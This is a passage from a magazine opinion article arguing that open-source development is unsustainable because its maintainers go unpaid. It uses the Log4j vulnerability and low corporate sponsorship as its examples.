CYBER SECURITY
Open source is dying, and the critical infrastructure bill could be the finishing blow By Jack Lindsay
R
ecently there was a massive vulnerability found in a critical Java ecosystem package. When fully weaponized the vulnerability allows attackers to manipulate Java servers into executing arbitrary code that is fetched from an LDAP server. It is an entirely reasonable solution to a real-world problem and accidentally created a massive hole in countless networks. This microcosm of the Open source ecosystem demonstrates why the Open source community may soon vanish.
If you want me to make you useful software, pay me. The ‘Log4j’ project is so beneficial it is essentially in the standard library for Java users. As of December 11, 2021, there was three sponsors for the author’s work. A day later, after it compromised a significant number of systems, the number had increased to 14. It is the yet unresolved – and possibly unresolvable – conundrum of Open source. Developers are put in a situation where software they create as a passion project on the side can end up as a critical component within a company’s stack. Ultimately, as is the case with Log4j, these developers find themselves in the precarious position where they’re not being paid for their efforts but are suddenly held responsible for significant disruption. The idea that Open source is a pool of free labour – or
14 | Cyber Risk Leaders Magazine
‘leech culture,’ as it has become known – has accelerated technologists well beyond the efficiency levels capable previously. It has also put the sector in a vulnerable state where a random smattering of volunteers have become critical for the business continuity of some of the largest enterprises in the world. It makes sense. The Open source community build valuable software. The vulnerability that created the #Log4j twitter storm is actually a great way to get a shell whenever you want. Which is why it is used so widely. As a result, there is a strong push within the community for companies that rely on Open source projects to recognise their ‘moral obligation’ and support projects by making donations.
The fallacy of Open source software development “Open source software is developed in a decentralised and collaborative way, relying on peer review and community production. Open source software is often cheaper, more flexible, and has more longevity than its proprietary peers because it is developed by communities rather than a single author or company” says Redhat when explaining what open source software is. This is the essence of open source, of which all projects are merely imitations. Something the community aspires to achieve but ultimately falls short. A recent example of this is the code-js debacle. This JavaScript library gives JavaScript’s standard library a lot